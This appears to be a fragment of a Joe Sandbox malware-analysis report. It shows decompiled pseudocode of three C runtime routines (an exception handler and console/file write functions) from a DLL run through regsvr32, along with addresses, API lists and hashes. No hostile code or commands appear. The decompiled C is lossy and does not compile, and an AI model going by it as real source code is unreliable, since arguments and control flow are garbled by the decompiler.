                                                                                                  C-Code - Quality: 68%
                                                                                                  			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                  				void* _t19;
                                                                                                  				void* _t27;
                                                                                                  				void* _t36;
                                                                                                  				void* _t39;
                                                                                                  				void* _t42;
                                                                                                  				void* _t43;
                                                                                                  				void* _t45;
                                                                                                  				void* _t46;
                                                                                                  				void* _t52;
                                                                                                  				void* _t54;
                                                                                                  				void* _t56;
                                                                                                  				void* _t59;
                                                                                                  
                                                                                                  				_t27 = _t45;
                                                                                                  				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                  				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                  				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                  				_t43 = _t27 - 0x3f;
                                                                                                  				_t46 = _t45 - 0xc0;
                                                                                                  				if ( *__rcx == 0x80000003) goto 0x800038a4;
                                                                                                  				E00000001180002D40(_t27);
                                                                                                  				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                  				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
                                                                                                  				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                  				E00000001180002D40(_t27);
                                                                                                  				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
                                                                                                  				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
                                                                                                  				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                  				if ( *__rcx == 0xe0434352) goto 0x800038c3;
                                                                                                  				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                  				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                  				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                  				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                  				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                  				if (_t19 == 0) goto 0x800038c3;
                                                                                                  				return _t19;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                  • Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                  • Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
                                                                                                  • Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
                                                                                                  • Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 32%
                                                                                                  			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                                                  				void* __rdi;
                                                                                                  				void* __rsi;
                                                                                                  				void* __rbp;
                                                                                                  				intOrPtr _t183;
                                                                                                  				signed int _t187;
                                                                                                  				signed int _t194;
                                                                                                  				signed int _t199;
                                                                                                  				intOrPtr _t208;
                                                                                                  				void* _t210;
                                                                                                  				signed char _t211;
                                                                                                  				void* _t261;
                                                                                                  				signed long long _t262;
                                                                                                  				long long _t267;
                                                                                                  				long long _t269;
                                                                                                  				void* _t270;
                                                                                                  				long long _t272;
                                                                                                  				intOrPtr* _t278;
                                                                                                  				intOrPtr* _t285;
                                                                                                  				long long _t287;
                                                                                                  				long long _t313;
                                                                                                  				void* _t321;
                                                                                                  				long long _t322;
                                                                                                  				void* _t323;
                                                                                                  				long long _t324;
                                                                                                  				long long _t326;
                                                                                                  				signed char* _t327;
                                                                                                  				signed char* _t328;
                                                                                                  				signed char* _t329;
                                                                                                  				void* _t330;
                                                                                                  				void* _t331;
                                                                                                  				void* _t332;
                                                                                                  				signed long long _t333;
                                                                                                  				intOrPtr _t336;
                                                                                                  				intOrPtr _t339;
                                                                                                  				void* _t341;
                                                                                                  				signed long long _t343;
                                                                                                  				signed long long _t345;
                                                                                                  				long long _t354;
                                                                                                  				void* _t358;
                                                                                                  				long long _t359;
                                                                                                  				signed long long _t362;
                                                                                                  				char _t363;
                                                                                                  				signed long long _t364;
                                                                                                  				void* _t367;
                                                                                                  				signed char* _t368;
                                                                                                  				signed long long _t370;
                                                                                                  
                                                                                                  				_t261 = _t332;
                                                                                                  				_t331 = _t261 - 0x57;
                                                                                                  				_t333 = _t332 - 0xd0;
                                                                                                  				 *((long long*)(_t331 - 9)) = 0xfffffffe;
                                                                                                  				 *((long long*)(_t261 + 8)) = __rbx;
                                                                                                  				_t262 =  *0x80021010; // 0x5388a1408558
                                                                                                  				 *(_t331 + 0x17) = _t262 ^ _t333;
                                                                                                  				 *((long long*)(_t331 - 0x41)) = __r8;
                                                                                                  				_t278 = __rcx;
                                                                                                  				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
                                                                                                  				_t362 = __edx >> 6;
                                                                                                  				 *(_t331 - 0x39) = _t362;
                                                                                                  				_t370 = __edx + __edx * 8;
                                                                                                  				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
                                                                                                  				 *((long long*)(_t331 - 0x19)) = _t267;
                                                                                                  				r12d = r9d;
                                                                                                  				_t359 = _t358 + __r8;
                                                                                                  				 *((long long*)(_t331 - 0x61)) = _t359;
                                                                                                  				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
                                                                                                  				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
                                                                                                  				0x80006f60();
                                                                                                  				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
                                                                                                  				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
                                                                                                  				 *((long long*)(__rcx)) = _t267;
                                                                                                  				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                                                  				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
                                                                                                  				_t343 = __edx >> 6;
                                                                                                  				 *(_t331 - 0x11) = _t343;
                                                                                                  				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
                                                                                                  				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
                                                                                                  				r12d = 1;
                                                                                                  				if (_t208 != 0xfde9) goto 0x8000d81d;
                                                                                                  				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
                                                                                                  				if ( *_t285 == dil) goto 0x8000d6ca;
                                                                                                  				_t367 = _t324 + 1;
                                                                                                  				if (_t367 - 5 < 0) goto 0x8000d6b7;
                                                                                                  				if (_t367 <= 0) goto 0x8000d7b3;
                                                                                                  				r12d =  *((char*)(_t285 + 0x1800218d1));
                                                                                                  				r12d = r12d + 1;
                                                                                                  				_t183 = r12d - 1;
                                                                                                  				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
                                                                                                  				_t336 = _t183;
                                                                                                  				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
                                                                                                  				_t287 = _t324;
                                                                                                  				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
                                                                                                  				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
                                                                                                  				if (_t336 <= 0) goto 0x8000d74b;
                                                                                                  				0x80004b30();
                                                                                                  				_t354 =  *((intOrPtr*)(_t331 - 0x59));
                                                                                                  				_t313 = _t324;
                                                                                                  				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
                                                                                                  				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
                                                                                                  				 *((long long*)(_t331 - 0x31)) = _t324;
                                                                                                  				_t269 = _t331 - 1;
                                                                                                  				 *((long long*)(_t331 - 0x29)) = _t269;
                                                                                                  				_t187 = (0 | r12d == 0x00000004) + 1;
                                                                                                  				r12d = _t187;
                                                                                                  				r8d = _t187;
                                                                                                  				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                  				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
                                                                                                  				if (_t269 == 0xffffffff) goto 0x8000da03;
                                                                                                  				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
                                                                                                  				goto 0x8000d8ae;
                                                                                                  				_t363 =  *((char*)(_t269 + 0x1800218d0));
                                                                                                  				_t210 = _t363 + 1;
                                                                                                  				_t270 = _t210;
                                                                                                  				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
                                                                                                  				 *((long long*)(_t331 - 0x51)) = _t324;
                                                                                                  				 *((long long*)(_t331 - 0x21)) = _t326;
                                                                                                  				_t194 = (0 | _t210 == 0x00000004) + 1;
                                                                                                  				r14d = _t194;
                                                                                                  				r8d = _t194;
                                                                                                  				 *((long long*)(_t333 + 0x20)) = _t354;
                                                                                                  				_t345 = _t331 - 0x51;
                                                                                                  				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
                                                                                                  				if (_t270 == 0xffffffff) goto 0x8000da03;
                                                                                                  				_t327 = _t326 + _t363;
                                                                                                  				r12d = r14d;
                                                                                                  				_t364 =  *(_t331 - 0x39);
                                                                                                  				goto 0x8000d8ae;
                                                                                                  				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
                                                                                                  				_t211 =  *(_t339 + 0x3d + _t370 * 8);
                                                                                                  				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
                                                                                                  				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
                                                                                                  				 *((char*)(_t331 + 8)) =  *_t327;
                                                                                                  				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
                                                                                                  				r8d = 2;
                                                                                                  				goto 0x8000d899;
                                                                                                  				r9d =  *_t327 & 0x000000ff;
                                                                                                  				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
                                                                                                  				_t368 =  &(_t327[1]);
                                                                                                  				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
                                                                                                  				r8d = 2;
                                                                                                  				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
                                                                                                  				_t328 = _t368;
                                                                                                  				goto 0x8000d8ae;
                                                                                                  				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
                                                                                                  				if (_t199 == 0xffffffff) goto 0x8000da03;
                                                                                                  				_t329 =  &(_t328[1]);
                                                                                                  				 *((long long*)(_t333 + 0x38)) = _t324;
                                                                                                  				 *((long long*)(_t333 + 0x30)) = _t324;
                                                                                                  				 *((intOrPtr*)(_t333 + 0x28)) = 5;
                                                                                                  				_t272 = _t331 + 0xf;
                                                                                                  				 *((long long*)(_t333 + 0x20)) = _t272;
                                                                                                  				r9d = r12d;
                                                                                                  				_t341 = _t331 - 0x6d;
                                                                                                  				E0000000118000A154();
                                                                                                  				r14d = _t199;
                                                                                                  				if (_t199 == 0) goto 0x8000da03;
                                                                                                  				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                  				r8d = _t199;
                                                                                                  				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                  				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
                                                                                                  				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
                                                                                                  				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
                                                                                                  				 *((short*)(_t331 - 0x71)) = 0xd;
                                                                                                  				 *((long long*)(_t333 + 0x20)) = _t324;
                                                                                                  				_t130 = _t272 - 0xc; // 0x1
                                                                                                  				r8d = _t130;
                                                                                                  				_t321 = _t331 - 0x71;
                                                                                                  				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
                                                                                                  				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
                                                                                                  				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
                                                                                                  				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
                                                                                                  				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
                                                                                                  				goto 0x8000d681;
                                                                                                  				if (_t321 <= 0) goto 0x8000d9a9;
                                                                                                  				_t330 = _t329 - _t368;
                                                                                                  				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
                                                                                                  				if (1 - _t321 < 0) goto 0x8000d988;
                                                                                                  				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
                                                                                                  				goto 0x8000da03;
                                                                                                  				if (_t341 <= 0) goto 0x8000d9da;
                                                                                                  				_t322 = _t324;
                                                                                                  				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
                                                                                                  				_t323 = _t322 + 1;
                                                                                                  				if (2 - _t341 < 0) goto 0x8000d9ba;
                                                                                                  				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
                                                                                                  				goto 0x8000da03;
                                                                                                  				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
                                                                                                  				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
                                                                                                  				_t173 = _t323 + 1; // 0x1
                                                                                                  				 *((intOrPtr*)(_t278 + 4)) = _t173;
                                                                                                  				goto 0x8000da03;
                                                                                                  				 *_t278 = GetLastError();
                                                                                                  				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
                                                                                                  			}

                                                                                                  0x18000d5b8
                                                                                                  0x18000d5c6
                                                                                                  0x18000d5ca
                                                                                                  0x18000d5d1
                                                                                                  0x18000d5d9
                                                                                                  0x18000d5dd
                                                                                                  0x18000d5e7
                                                                                                  0x18000d5ee
                                                                                                  0x18000d5f5
                                                                                                  0x18000d5fc
                                                                                                  0x18000d606
                                                                                                  0x18000d60a
                                                                                                  0x18000d618
                                                                                                  0x18000d624
                                                                                                  0x18000d629
                                                                                                  0x18000d62d
                                                                                                  0x18000d630
                                                                                                  0x18000d633
                                                                                                  0x18000d63d
                                                                                                  0x18000d64a
                                                                                                  0x18000d64f
                                                                                                  0x18000d65c
                                                                                                  0x18000d65f
                                                                                                  0x18000d664
                                                                                                  0x18000d667
                                                                                                  0x18000d66e
                                                                                                  0x18000d677
                                                                                                  0x18000d67b
                                                                                                  0x18000d683
                                                                                                  0x18000d686
                                                                                                  0x18000d689
                                                                                                  0x18000d69c
                                                                                                  0x18000d6af
                                                                                                  0x18000d6ba
                                                                                                  0x18000d6be
                                                                                                  0x18000d6c8
                                                                                                  0x18000d6cd
                                                                                                  0x18000d6e1
                                                                                                  0x18000d6ea
                                                                                                  0x18000d6f0
                                                                                                  0x18000d6f2
                                                                                                  0x18000d6fc
                                                                                                  0x18000d702
                                                                                                  0x18000d708
                                                                                                  0x18000d71d
                                                                                                  0x18000d72a
                                                                                                  0x18000d72f
                                                                                                  0x18000d73b
                                                                                                  0x18000d740
                                                                                                  0x18000d74b
                                                                                                  0x18000d759
                                                                                                  0x18000d764
                                                                                                  0x18000d766
                                                                                                  0x18000d76a
                                                                                                  0x18000d76e
                                                                                                  0x18000d77b
                                                                                                  0x18000d77d
                                                                                                  0x18000d780
                                                                                                  0x18000d783
                                                                                                  0x18000d794
                                                                                                  0x18000d79d
                                                                                                  0x18000d7ab
                                                                                                  0x18000d7ae
                                                                                                  0x18000d7b6
                                                                                                  0x18000d7bf
                                                                                                  0x18000d7ca
                                                                                                  0x18000d7d0
                                                                                                  0x18000d7d6
                                                                                                  0x18000d7da
                                                                                                  0x18000d7e6
                                                                                                  0x18000d7e8
                                                                                                  0x18000d7eb
                                                                                                  0x18000d7ee
                                                                                                  0x18000d7f3
                                                                                                  0x18000d7ff
                                                                                                  0x18000d808
                                                                                                  0x18000d80e
                                                                                                  0x18000d811
                                                                                                  0x18000d814
                                                                                                  0x18000d818
                                                                                                  0x18000d81d
                                                                                                  0x18000d825
                                                                                                  0x18000d82d
                                                                                                  0x18000d834
                                                                                                  0x18000d839
                                                                                                  0x18000d83f
                                                                                                  0x18000d844
                                                                                                  0x18000d84e
                                                                                                  0x18000d850
                                                                                                  0x18000d860
                                                                                                  0x18000d862
                                                                                                  0x18000d86a
                                                                                                  0x18000d873
                                                                                                  0x18000d888
                                                                                                  0x18000d88e
                                                                                                  0x18000d891
                                                                                                  0x18000d8a0
                                                                                                  0x18000d8a8
                                                                                                  0x18000d8ae
                                                                                                  0x18000d8b1
                                                                                                  0x18000d8b6
                                                                                                  0x18000d8bb
                                                                                                  0x18000d8c3
                                                                                                  0x18000d8c7
                                                                                                  0x18000d8cc
                                                                                                  0x18000d8cf
                                                                                                  0x18000d8d8
                                                                                                  0x18000d8dd
                                                                                                  0x18000d8e2
                                                                                                  0x18000d8e8
                                                                                                  0x18000d8f1
                                                                                                  0x18000d907
                                                                                                  0x18000d915
                                                                                                  0x18000d91c
                                                                                                  0x18000d926
                                                                                                  0x18000d92d
                                                                                                  0x18000d931
                                                                                                  0x18000d93a
                                                                                                  0x18000d93a
                                                                                                  0x18000d93e
                                                                                                  0x18000d94d
                                                                                                  0x18000d957
                                                                                                  0x18000d95d
                                                                                                  0x18000d960
                                                                                                  0x18000d96a
                                                                                                  0x18000d97b
                                                                                                  0x18000d983
                                                                                                  0x18000d985
                                                                                                  0x18000d997
                                                                                                  0x18000d9a7
                                                                                                  0x18000d9a9
                                                                                                  0x18000d9ac
                                                                                                  0x18000d9b1
                                                                                                  0x18000d9b3
                                                                                                  0x18000d9c8
                                                                                                  0x18000d9cf
                                                                                                  0x18000d9d8
                                                                                                  0x18000d9da
                                                                                                  0x18000d9de
                                                                                                  0x18000d9e0
                                                                                                  0x18000d9ed
                                                                                                  0x18000d9f3
                                                                                                  0x18000d9f6
                                                                                                  0x18000d9f9
                                                                                                  0x18000da01
                                                                                                  0x18000da2c

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                  • String ID:
                                                                                                  • API String ID: 2718003287-0
                                                                                                  • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                  • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                                  • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                                  • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 28%
                                                                                                  			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                  				signed long long _v88;
                                                                                                  				void* _v96;
                                                                                                  				void* _v108;
                                                                                                  				signed int _v112;
                                                                                                  				intOrPtr _v120;
                                                                                                  				signed int _v124;
                                                                                                  				long _v128;
                                                                                                  				signed int _v136;
                                                                                                  				long long _v144;
                                                                                                  				signed int _v152;
                                                                                                  				void* __rbx;
                                                                                                  				void* __rsi;
                                                                                                  				void* __rbp;
                                                                                                  				signed short _t99;
                                                                                                  				void* _t107;
                                                                                                  				long _t116;
                                                                                                  				signed int _t117;
                                                                                                  				void* _t122;
                                                                                                  				signed short _t127;
                                                                                                  				signed int _t130;
                                                                                                  				signed short _t133;
                                                                                                  				signed short _t159;
                                                                                                  				signed short _t167;
                                                                                                  				signed long long _t180;
                                                                                                  				signed int _t184;
                                                                                                  				signed short* _t197;
                                                                                                  				signed int _t204;
                                                                                                  				signed int _t205;
                                                                                                  				signed short* _t206;
                                                                                                  				void* _t208;
                                                                                                  				signed long long _t220;
                                                                                                  				void* _t221;
                                                                                                  				signed long long _t222;
                                                                                                  				signed long long _t223;
                                                                                                  				void* _t224;
                                                                                                  				signed short* _t226;
                                                                                                  
                                                                                                  				_t197 = __rdx;
                                                                                                  				_t122 = __ebx;
                                                                                                  				r14d = r8d;
                                                                                                  				_t184 = __r9;
                                                                                                  				_t206 = __rdx;
                                                                                                  				if (r8d == 0) goto 0x8000e1d3;
                                                                                                  				if (__rdx != 0) goto 0x8000df47;
                                                                                                  				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                  				r8d = 0;
                                                                                                  				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                  				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                  				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                  				r9d = 0;
                                                                                                  				_v144 = __r9;
                                                                                                  				_v152 = _t205;
                                                                                                  				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
                                                                                                  				goto 0x8000e1d5;
                                                                                                  				_t220 = __ecx >> 6;
                                                                                                  				_v88 = _t220;
                                                                                                  				_t223 = __ecx + __ecx * 8;
                                                                                                  				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
                                                                                                  				_v136 = _t99;
                                                                                                  				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
                                                                                                  				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
                                                                                                  				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
                                                                                                  				_t23 = _t197 + 2; // 0x2
                                                                                                  				r8d = _t23;
                                                                                                  				E0000000118000E958(r15d);
                                                                                                  				_v112 = _t205;
                                                                                                  				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
                                                                                                  				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
                                                                                                  				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
                                                                                                  				0x80006f60();
                                                                                                  				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
                                                                                                  				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
                                                                                                  				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
                                                                                                  				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
                                                                                                  				_t127 = _v136;
                                                                                                  				_t159 = _t127;
                                                                                                  				if (_t159 == 0) goto 0x8000e099;
                                                                                                  				if (_t159 == 0) goto 0x8000e024;
                                                                                                  				if (_t127 - 1 != 1) goto 0x8000e15d;
                                                                                                  				_t221 = _t206 + _t224;
                                                                                                  				_v128 = _t205;
                                                                                                  				_t226 = _t206;
                                                                                                  				if (_t206 - _t221 >= 0) goto 0x8000e090;
                                                                                                  				r14d = _v124;
                                                                                                  				_v136 =  *_t226 & 0x0000ffff;
                                                                                                  				_t107 = E0000000118000E960( *_t226 & 0xffff);
                                                                                                  				_t130 = _v136 & 0x0000ffff;
                                                                                                  				if (_t107 != _t130) goto 0x8000e087;
                                                                                                  				r14d = r14d + 2;
                                                                                                  				_v124 = r14d;
                                                                                                  				if (_t130 != 0xa) goto 0x8000e07c;
                                                                                                  				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
                                                                                                  				r14d = r14d + 1;
                                                                                                  				_v124 = r14d;
                                                                                                  				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
                                                                                                  				goto 0x8000e038;
                                                                                                  				_v128 = GetLastError();
                                                                                                  				_t222 = _v88;
                                                                                                  				goto 0x8000e153;
                                                                                                  				r9d = r14d;
                                                                                                  				_v152 = __r9;
                                                                                                  				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
                                                                                                  				asm("movsd xmm0, [eax]");
                                                                                                  				goto 0x8000e158;
                                                                                                  				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
                                                                                                  				_t133 = _v136;
                                                                                                  				_t167 = _t133;
                                                                                                  				if (_t167 == 0) goto 0x8000e10c;
                                                                                                  				if (_t167 == 0) goto 0x8000e0f8;
                                                                                                  				if (_t133 - 1 != 1) goto 0x8000e164;
                                                                                                  				r9d = r14d;
                                                                                                  				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                  				goto 0x8000e0b0;
                                                                                                  				r9d = r14d;
                                                                                                  				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
                                                                                                  				goto 0x8000e0b0;
                                                                                                  				r9d = r14d;
                                                                                                  				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
                                                                                                  				goto 0x8000e0b0;
                                                                                                  				r8d = r14d;
                                                                                                  				_v152 = _v152 & _t180;
                                                                                                  				_v128 = _t180;
                                                                                                  				_v120 = 0;
                                                                                                  				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
                                                                                                  				_t116 = GetLastError();
                                                                                                  				_v128 = _t116;
                                                                                                  				asm("movsd xmm0, [ebp-0x40]");
                                                                                                  				asm("movsd [ebp-0x30], xmm0");
                                                                                                  				if (_t116 != 0) goto 0x8000e1cc;
                                                                                                  				_t117 = _v112;
                                                                                                  				if (_t117 == 0) goto 0x8000e1a3;
                                                                                                  				if (_t117 != 5) goto 0x8000e193;
                                                                                                  				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                  				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
                                                                                                  				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                  				 *(_t184 + 0x34) = _t117;
                                                                                                  				goto 0x8000df3f;
                                                                                                  				_t204 = _t184;
                                                                                                  				E000000011800086B0(_v112, _t204);
                                                                                                  				goto 0x8000df3f;
                                                                                                  				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
                                                                                                  				if ( *_t206 == 0x1a) goto 0x8000e1d3;
                                                                                                  				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
                                                                                                  				 *((char*)(_t184 + 0x30)) = 1;
                                                                                                  				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
                                                                                                  				 *((char*)(_t184 + 0x38)) = 1;
                                                                                                  				goto 0x8000df3f;
                                                                                                  				goto 0x8000e1d5;
                                                                                                  				return 0;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
